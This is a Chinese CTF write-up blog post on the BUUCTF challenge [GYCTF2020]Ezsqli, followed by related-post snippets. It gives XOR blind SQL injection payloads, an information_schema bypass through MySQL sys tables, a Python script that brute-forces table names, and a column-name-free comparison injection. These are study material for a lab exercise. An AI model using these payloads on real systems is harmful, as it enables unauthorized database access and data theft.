buuctf-[GYCTF2020]Ezsqli(异或注入无列名)

已于 2022-05-21 12:05:50 修改
阅读量587 收藏 1
点赞数
文章标签: p2p linq 网络协议
于 2022-05-18 22:01:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124846265
版权

尝试过后发现只有1,2可以,3以上会显示错误

尝试一下slq注入,但是输入不是1,2的就会显示错误

尝试异或注入

被过滤了 

 过滤了for,in在information里也被过滤了

 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了

id=1^(ascii(substr(database(),1,1))=103)^1

也可以用这个查其他数据库 

id=1^(ascii(substr((select(group_concat(table_name))from(sys.x$schema_flattened_keys)),1,1))=102)^1

 

换成 innodb_table_stats 也没用

 聊一聊bypass information_schema - 安全客,安全资讯平台

用 sys.x$schema_flattened_keys 或者 sys.schema_table_statistics_with_buffer 代替,然后可以查表

id=1^(ascii(substr((select(group_concat(table_name))from(sys.x$schema_flattened_keys)where(table_schema=database())),1,1))=102)^1

import requests

url='http://35737a35-63b7-4e60-a584-e5cbbead6dc6.node3.buuoj.cn/index.php'
#give_grandpa_pa_pa_pa

payload_table='1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys where table_schema=database()),{},1))>{})^1'
flag =''
for i in range(1,100):
    low = 32
    high = 132
    mid = (low + high) //2
    while(low < high):
        payload = payload_table.format(i,mid)
        data={"id": payload}
        print(payload)
        r = requests.post(url=url,data=data)
        if 'Nu1L' in r.text:
            low = mid+1
        else:
            high = mid

        mid = (low+high) //2
    if(mid ==32 or mid == 127):
        break
    flag +=chr(mid)
    print(flag)

查到表名

f1ag_1s_h3r3_hhhhh,users233333333333333

继续查列名,但是列名好像又不能用之前的两个词了

后面需要无列名注入

无列名注入主要是适用于已经获取到数据表,但无法查询列的情况下,在大多数 CTF 题目中,information_schema 库被过滤,使用这种方法获取列名。

id=1^((1,'G')>(select * from f1ag_1s_h3r3_hhhhh))^1

没查到可以用ascii的方式

m0_62094846
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
易语言-BCC校验(异或校验)计算
06-25
易语言-BCC校验(异或校验)计算
xctf攻防世界easysql wp
sash1mi
02-20 1730
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
[GYCTF2020]Ezsqli ---不会编程的崽
最新发布
不会编程的崽的博客
03-22 408
既然知道是sql注入就不墨迹了。初步判断盲注,判断盲注的方发不用说了吧,然后fuzz一下,information被过滤了。再次可以判断为盲注与无列名注入。因为无列名注入无法获得列名,不能使用普通盲注,而且这里也无法使用union select。来尝试一下新的方法吧。管他有列名还是无列名,先找到表。由于information被过滤了。这是比较形象的解释。所以构造payload。这题不难,难的是不知道有哪些表可以利用,不知道这种比较方法。又是sql新题型哦。最后在转化为小写就可以提交了。脚本写的不好,请见谅。
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1315
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
SQL注入练习
qq_49422880的博客
07-31 774
[GYCTF2020]Ezsqli 这道题输入几个数字之后,我就感觉就是要用盲注暴力破解。所以就看看报错的内容是什么,进行异或注入即可。 输入1的时候显示 输入2的时侯显示 输到三的时候 Error Occured When Fetch Result. 输到十的时候 Error Occured When Fetch Result. 随便输入字符 bool(false) 嘿嘿,基本确定是要跑脚本暴力破解。 先做fuzz测试,看看过滤掉哪些关键词 handler INFORMATION,还有很多… 1.开
[GYCTF2020]Ezsqli
feng的博客
12-16 424
知识点 SQL注入 绕过information的过滤 ascii偏移 WP 进入环境,根据题目意思已经很明显是SQL注入了,经过测试是个数字型注入,过滤了一些东西,union和in被过滤了,in过滤导致我们用不了information_schema,因此要考虑绕过。 这题可以替代information_schema有几种方式,但是我踩了一个坑。这题的表有2个:f1ag_1s_h3r3_hhhhh和users233333333333333,这题可以用来替代information_schema的有三个: s
shellcode-to-dll:shellcode 异或加密并生成dll
04-23
shellcode To DLL shellcode 异或加密并生成dll
易语言-asm_异或加解密
06-25
之前用分割文本 分割字节集形式去做异或加解密 贼慢 于是手搓一个asm的。
BP-xor.rar_bp 异或
09-21
基于c++实现bp神经网络实现异或功能 有助于了解神经网络
14-位运算符(与-或-异或).avi
11-02
价值上万的Java精品网课教程\第02天(进制,位运算,语句)
[2020网络安全管理职业技能竞赛全国选拔赛]ezsqli
末初的CSDN博客
11-07 1799
hint <?php //a "part" of the source code here function sqlWaf($s) { $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i'; if (preg_matc..
BUUCTF WEB Ezsqli
qq_41696858的博客
04-01 5352
继续刷题,comment之前在攻防世界刷过了,就不刷了。从题目上我们就知道这一题是个sql注入题 打开场景,我们发现依旧的儒雅随和 一个查询框,那么就是要硬搞了呗 经查询1,2是两条有效数字,0和其他的都是非法输入 1+1成功回显2,下面就是过滤字判断 既然是布尔型的回显,先试试0^1,嗯,异或符给我们留下了 布尔类型查用的substr,ascii先试试 0^(ascii(substr(‘hello’,1,1))>1) 1^(ascii(substr(‘hello’,1,1))>1) 成功回显,
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 353
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
1-0x15循环异或
12-25
循环异或是指对一个区间内的所有数进行异或运算。对于题目中的1-0x15循环异或,表示对从1到0x15(十进制为21)的所有数进行循环异或运算。 以下是一个演示循环异或的例子: ```python start = 1 end = 0x15 result = 0 for i in range(start, end+1): result ^= i print("循环异或结果为:", result) ``` 运行以上代码,输出结果为:循环异或结果为: 0 这是因为从1到21的所有数进行异或运算后,结果为0。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值